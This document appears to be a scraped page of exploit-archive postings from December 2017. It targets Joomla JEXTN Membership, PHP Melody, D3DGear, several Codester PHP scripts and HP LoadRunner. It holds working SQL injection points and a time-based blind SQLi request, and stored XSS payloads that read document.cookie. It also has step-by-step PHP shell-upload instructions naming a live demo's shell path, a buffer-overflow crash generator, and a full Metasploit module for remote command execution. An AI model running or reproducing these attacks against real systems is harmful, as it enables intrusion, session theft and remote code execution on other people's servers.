Joomla! JEXTN Membership 3.1.0 SQL Injection

Joomla! JEXTN Membership 3.1.0 SQL Injection
Posted Dec 31, 2017
Authored by Bilal Kardadou

Joomla! JEXTN Membership component version 3.1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 5f1419e50ed85b94dd410fc19bfd6d79
################################################
#Title: Joomla! JEXTN Membership 3.1.0 - SQL injection
#Credit: Bilal KARDADOU
#Vendor: http://www.jextn.com
#URL:
https://extensions.joomla.org/extensions/extension/e-commerce/membership-a-subscriptions/jextn-membership/
#Product: 'Joomla! JEXTN Membership 3.1.0'
#Developer: jextn.com
#Last updated: Jan 05 2016
#Compatibility: 3.X
#Type: Paid download
################################################
#
# 1-GET -p [planid]
#
#
http://127.0.0.1/joomla/index.php?option=com_jemembership&view=plans&task=plans.getSubscriptionplans&planid=6[SQLI]
#
# 2-POST -p [subscription1_periods]
#
# http://127.0.0.1/joomla/index.php/my-profile?view=registration
#
# subscription1_periods=2[SQLI]
#
# 3-POST -p [period_name]
#
#
http://demo01.jextn.com/membership-demo/index.php/my-profile?view=registration
#
# period_name=2[SQLI]
#
# PoC:
# https://prnt.sc/hukhde
# https://prnt.sc/hukhue
# https://prnt.sc/huki0n
# https://prnt.sc/huki61
#
#Greetz to imad teb bernoussi lmkalkhine
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################

Easy Web Grabber 1.0.0 Cross Site Scripting

# Exploit Title: Easy Web Grabber PHP – xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/risioja
# Software Buy: https://www.codester.com/items/5292/easy-web-grabber-php
# Demo: http://winnky.000webhostapp.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to Projects page:
2. click to “Create new project”
3. insert to textbox “Project title:” -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
4. click to SUBMIT …

😀

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/————————————————————-\
| My Message To |
\————————————————————-/
|= [!] Make Love,Not War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

PHP Melody 2.7.1 SQL Injection

# Exploit Title: PHP Melody v2.7.1 - SQL Injection
# Date: 30/12/2017
# Exploit Author: Ahmad Mahfouz
# Contact: http://twitter.com/eln1x
# Vendor Homepage: http://www.phpsugar.com/ Buy http://www.phpsugar.com/phpmelody_order.html
# Version: 2.7.1
# Tested on: Mac OS
#
# SQL Injection Type: time-based blind
# Parameter: playlist
# Page: ajax.php
# URL: http://target.com/ajax.php?p=video&do=getplayer&vid=[VALID_VIDO_ID]&aid=1&player=detail&playlist=[SQLi]

GET /ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=detail&playlist='+(select*from(select(sleep(20)))a)+' HTTP/1.1
Host: localhost
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close

D3DGear 5.00 Build 2175 Buffer Overflow

#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: D3DGear 5.00 Build 2175 - Buffer Overflow
# Date: 07-11-2017
# Vulnerable Software: D3DGear 5.00 Build 2175
# Vendor Homepage: http://www.d3dgear.com/
# Version: 5.00 Build 2175
# Software Link: http://www.d3dgear.com/products.htm
# Tested On: Windows 7 x86
#
#
# PoC: generate crash.txt, open program, select broadcast, paste crash.txt contents in stream key
#
# app crashes; 00420042 Pointer to next SEH record; no eip overwrite; one unicode ppr pointer
#

file = "crash.txt"

buffer = "A"* 1284 + "B"*4
writeFile = open (file, "w")
writeFile.write( buffer )
writeFile.close()

Chatting System PHP Ajax MySQL JavaScript 1.0 Shell Upload

# Exploit Title: Chatting System PHP Ajax MySQL JavaScript – Remote Shell Upload
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/IngeniousDeveloper
# Software Buy: https://www.codester.com/items/5477/chatting-system-php-ajax-mysql-javascript
# Demo: http://chat.yourphpscript.com/view/login.php
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to http:[site]/view/login.php
2. Click to New User
3. insert to all textbox your data
4. select your shell.php in Profile Picture .
4. in firefox browser , click right and press “Q” on the keyboard or click to Inspect Element.
5. find in code Sing Up and remove disabled=”disabled” in Button tag.
6. Click to Sing Up.
7. Login to your page and “View Page Source” .
8. Ctrl+F to find “User Pic”
9. your shell uploaded : http://[site]/uploads/[ex].php
10. dem0: http://chat.yourphpscript.com/uploads/20171230114001.php

😀

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/————————————————————-\
| My Message To |
\————————————————————-/
|= [!] Make Love,Not War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

Auto Generate Data Sample 1.0 Cross Site Scripting

# Exploit Title: Auto Generate Data Sample PHP – xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/niagawebster
# Software Buy: https://www.codester.com/items/5580/auto-generate-data-sample-php
# Demo: http://generator.niagawebster.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to index page:
2. Create Number Of Rows 1*1
3. insert to textbox “Customize Data Required – Column 1 : ” -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
4. click to Generate Data …

😀

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/————————————————————-\
| My Message To |
\————————————————————-/
|= [!] Make Love,Not War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

Chatting System PHP Ajax MySQL JavaScript 1.0 Cross Site Scripting

# Exploit Title: Chatting System PHP Ajax MySQL JavaScript – xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/IngeniousDeveloper
# Software Buy: https://www.codester.com/items/5477/chatting-system-php-ajax-mysql-javascript
# Demo: http://chat.yourphpscript.com/view/login.php
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to http:[site]/view/login.php
2. Click to New User
3. insert to textbox “Full Name” Or “Address” -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
4. insert other textbox…
5. click to Sing Up
6. Login to your page .

😀

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/————————————————————-\
| My Message To |
\————————————————————-/
|= [!] Make Love,Not War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

Photo Fusion 1.0 Cross Site Scripting

# Exploit Title: Photo Fusion – Free Stock Photos Script – Xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://codecanyon.net/user/teamworktec
# Software Buy: https://codecanyon.net/item/photo-fusion-free-stock-photos-script/20115244
# Demo: http://sportsgrand.com/demo/photo_fusion
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to http://[site]/register
2. registe
3. login in to page
4. Go to http://[site]/latest , clicl to ever post.
4. insert to textbox “Comments” -> <script>alert(/ShanoWeb/);</script>
5. Click to send.

Laravel 5.4.x :D:D

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/————————————————————-\
| My Message To |
\————————————————————-/
|= [!] Make Love,Not War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

Wikipedia Search Engine 1.0 Cross Site Scripting

# Exploit Title: Wikipedia Search Engine PHP – xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/niagawebster
# Software Buy: https://www.codester.com/items/5328/wikipedia-search-engine-php
# Demo: http://wikipedia.niagawebster.com/index.php
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to index page:
2. insert to textbox “Search and Download On Wiki” -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
3. click to search now …

😀

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/————————————————————-\
| My Message To |
\————————————————————-/
|= [!] Make Love,Not War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager

def initialize(info={})
super(update_info(info,
‘Name’ => “HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution”,
‘Description’ => %q{
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50
and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are
also most likely vulneable if the (non-default) SSL option is turned off.
By sending a specially crafted packet, an attacker can execute commands remotely.
The service is vulnerable provided the Secure Channel feature is disabled (default).
},
‘License’ => MSF_LICENSE,
‘Author’ =>
[
‘Unknown’, # Original discovery # From Tenable Network Security
‘aushack’ # metasploit module
],
‘References’ =>
[
[‘CVE’, ‘2010-1549’],
[‘ZDI’, ’10-080′],
[‘BID’, ‘39965’],
[‘URL’, ‘https://support.hpe.com/hpsc/doc/public/display?docId=c00912968’]
],
‘Payload’ => { ‘BadChars’ => “\x0d\x0a\x00” },
‘Platform’ => ‘win’,
‘Targets’ =>
[
# Note: software reportedly supports Linux – may also be vulnerable.
[‘Windows (Dropper)’,
‘Platform’ => ‘win’,
‘Arch’ => [ARCH_X86, ARCH_X64]
],
],
‘Privileged’ => false,
‘Stance’ => Msf::Exploit::Stance::Aggressive,
‘DisclosureDate’ => ‘May 06 2010’,
‘DefaultTarget’ => 0))

register_options([Opt::RPORT(54345)])
end

def autofilter
true
end

def execute_command(cmd, _opts = {})
guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17))
randstr = Rex::Text.rand_text_alpha(16)
server_name = Rex::Text.rand_text_alpha(7)
server_ip = datastore[‘LHOST’]
server_port = Rex::Text.rand_text_numeric(4)
# If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd
cmd1 = “C:\\Windows\\system32\\cmd.exe”
cmd2 = “/C \”#{cmd}\””

pkt1 = [0x19].pack(‘N’) + guid + ‘0’

pkt2 = [0x6].pack(‘N’) + [0x0].pack(‘N’) + “(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})”
pkt2 << “(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00”
pkt2 << [0x7530].pack(‘N’)

pkt3 = [4 + pkt2.length].pack(‘N’) + pkt2

pkt4 = [0x1c].pack(‘N’) + [0x05].pack(‘N’) + [0x01].pack(‘N’) + randstr + pkt3

pkt5 = [pkt4.length].pack(‘N’) + pkt4

pkt6 = [0x437].pack(‘N’) + [0x0].pack(‘N’) + [0x31].pack(‘N’) + [1].pack(‘N’) + [0x31000000].pack(‘N’)
pkt6 << [cmd1.length].pack(‘N’) + cmd1 + “\x00” + [cmd2.length].pack(‘N’) + cmd2 + [0x0].pack(‘N’) + [0x0].pack(‘N’)

pkt7 = [4 + pkt6.length].pack(‘N’) + pkt6

pkt8 = [0x18].pack(‘N’) + [0x04].pack(‘N’) + randstr + pkt7

pkt9 = [pkt8.length].pack(‘N’) + pkt8

sploit = pkt1 + pkt5 + pkt9

connect
sock.put(sploit)
disconnect
end

def exploit
print_status(‘Sending payload…’)
execute_cmdstager(linemax: 1500)
end
end